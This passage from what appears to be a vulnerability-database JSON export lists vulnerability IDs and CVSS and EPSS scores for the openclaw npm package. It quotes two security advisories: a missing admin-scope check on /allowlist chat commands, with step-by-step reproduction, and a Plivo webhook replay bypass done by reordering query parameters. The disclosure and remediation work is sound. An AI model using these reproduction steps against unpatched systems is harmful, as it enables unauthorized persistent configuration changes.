"VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-35641", "GHSA-m3mh-3mpg-37hw" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-brfj-4shr-qkgc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91829?format=api", "vulnerability_id": "VCID-bumq-54sb-6ua7", "summary": "OpenClaw: Mutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n**Title** \nMutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement\n\n**CWE** \nCWE-862 Missing Authorization\n\n**CVSS v3.1** \nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N \nBase score: **6.5 (Medium)**\n\n**Severity Assessment** \nMedium. This is a real authorization flaw in OpenClaw’s internal control plane. The issue does not require host access, trusted local state tampering, or multi-tenant assumptions, but exploitation does require an already authenticated internal Gateway caller with `operator.write`.\n\n**Impact** \nAn authenticated internal Gateway caller limited to `operator.write` can perform state-changing `/allowlist` actions without `operator.admin`, even though comparable mutating internal chat commands already require `operator.admin`. The reachable effects are persistent changes to config-backed `allowFrom` entries and pairing-store-backed allowlist entries.\n\nThis is not a semantic-modeling complaint and not a generic “trusted operator can do things” claim. It is a missing authorization check inside OpenClaw’s own internal scope model, where peer mutating command surfaces already distinguish `operator.write` from `operator.admin`.\n\n**Affected Component** \nVerified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`.\n\nExact vulnerable path on the shipped tag:\n- `src/auto-reply/reply/commands-allowlist.ts:251-254`\n - `/allowlist` authorization uses only `rejectUnauthorizedCommand(...)`.\n- `src/auto-reply/reply/commands-allowlist.ts:386-524`\n - mutating config and pairing-store writes happen here, but there is no `requireGatewayClientScopeForInternalChannel(..., operator.admin, ...)`.\n\nReachability and scope model:\n- `src/gateway/method-scopes.ts:94-109`\n - `chat.send` is a write-scoped method.\n- `src/gateway/server.chat.gateway-server-chat.test.ts:539-559`\n - existing runtime coverage proves `chat.send` routes slash commands without an agent run.\n- `src/auto-reply/command-auth.ts:574-577`\n - internal callers become `senderIsOwner` only when `GatewayClientScopes` includes `operator.admin`.\n\nComparable internal mutating command paths already enforce `operator.admin`:\n- `src/auto-reply/reply/commands-config.ts:64-73`\n- `src/auto-reply/reply/commands-mcp.ts:89-96`\n- `src/auto-reply/reply/commands-plugins.ts:387-394`\n- `src/auto-reply/reply/commands-acp.ts:98-106`\n\nVersion history:\n- Introduced by commit `555b2578a8cc6e1b93f717496935ead97bfbed8b` (`feat: add /allowlist command`)\n- Earliest released affected tag found: `v2026.1.20`\n- Latest released affected tag verified: `v2026.3.23`\n\n**Technical Reproduction** \n1. Check out the shipped release tag `v2026.3.23`.\n2. Use an internal command context with:\n - `Provider = \"webchat\"`\n - `Surface = \"webchat\"`\n - `GatewayClientScopes = [\"operator.write\"]`\n - `params.command.channel = \"webchat\"`\n3. Route a slash command through `chat.send`.\n4. Execute either of these mutating commands:\n - `/allowlist add dm channel=telegram 789`\n - `/allowlist add dm --store channel=telegram 789`\n5. Confirm the command context is authorized but not owner-equivalent:\n - `isAuthorizedSender === true`\n - `senderIsOwner === false`\n6. Observe that the commands still succeed and perform persistent writes.\n\n**Demonstrated Impact** \nThe vulnerable handler performs real state mutation for a low-scope internal caller:\n- Config-backed mutation path:\n - `src/auto-reply/reply/commands-allowlist.ts:398-503`\n - reads the config snapshot, applies the edit, validates, and writes the updated config to disk.\n- Store-backed mutation path:\n - `src/auto-reply/reply/commands-allowlist.ts:479-485`\n - `src/auto-reply/reply/commands-allowlist.ts:513-518`\n - updates the pairing-store allowlist without any admin-scope gate.\n\nThe result is successful persistence, not just a misleading success message.\n\n**Environment** \n- Product: OpenClaw\n- Verified shipped tag: `v2026.3.23`\n- Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2`\n- Published GitHub release time: `2026-03-23T23:15:50Z`\n- Verification date: `2026-03-24`\n\n**Duplicate Check** \nThis is not a duplicate of:\n- `GHSA-pjvx-rx66-r3fg`\n - that advisory covered cross-account scoping in `/allowlist ... --store`, not missing internal `operator.admin` enforcement.\n- `GHSA-hfpr-jhpq-x4rm`\n - that advisory covered `/config` writes through `chat.send`, not `/allowlist`.\n- `GHSA-3w6x-gv34-mqpf`\n - same authorization class, but different command path (`/acp`, not `/allowlist`).\n\n**In Scope Check** \nThis report is in scope under `SECURITY.md` because:\n- it does **not** rely on adversarial operators sharing one gateway host or config;\n- it does **not** target the HTTP compatibility endpoints that `SECURITY.md` explicitly treats as full operator-access surfaces;\n- it demonstrates a real authorization mismatch inside OpenClaw’s own internal control-plane scope model (`operator.write` vs `operator.admin`);\n- peer mutating internal chat commands already enforce `operator.admin`, so this is not a request for a new boundary but a missing check on an existing one.\n\nThis is therefore a concrete authorization bug, not a trusted-operator hardening suggestion.\n\n**Remediation Advice** \n1. Add `requireGatewayClientScopeForInternalChannel(..., allowedScopes: [\"operator.admin\"], ...)` to the mutating internal `/allowlist` paths.\n2. Add regression coverage for both mutation modes:\n - internal `operator.write` must be rejected;\n - internal `operator.admin` must be allowed.\n3. Cover both config-backed and store-backed writes.\n4. Audit other mutating internal chat-command paths for the same missing-scope pattern.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83" }, { "reference_url": "https://github.com/advisories/GHSA-vqvg-86cc-cg83", "reference_id": "GHSA-vqvg-86cc-cg83", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vqvg-86cc-cg83" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "GHSA-vqvg-86cc-cg83" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bumq-54sb-6ua7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91130?format=api", "vulnerability_id": "VCID-bzw7-yvu2-yqa2", "summary": "OpenClaw: Voice-call Plivo V3 webhook replay key uses unsorted URL, allowing replay via query-parameter reordering\n## Summary\n\nPlivo V3 signature verification canonicalized query ordering, but replay detection hashed the raw verification URL. Reordering query parameters preserved a valid signature while producing a fresh replay-cache key.\n\n## Impact\n\nAn attacker who captured one valid signed Plivo V3 webhook could replay the same event by permuting query parameters and trigger duplicate voice-call processing.\n\n## Affected Component\n\n`extensions/voice-call/src/webhook-security.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `85777e726c` (`Voice Call: canonicalize Plivo V3 replay key`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41395", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05113", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05091", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.05098", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41395" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/85777e726cb02c01a911b3ff832ddf4d664d5c94", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/85777e726cb02c01a911b3ff832ddf4d664d5c94" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8689-gm9g-jgr6", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:20:49Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8689-gm9g-jgr6" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41395", "reference_id": "CVE-2026-41395", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41395" }, { "reference_url": "https://github.com/advisories/GHSA-8689-gm9g-jgr6", "reference_id": "GHSA-8689-gm9g-jgr6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8689-gm9g-jgr6" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3", "reference_id": 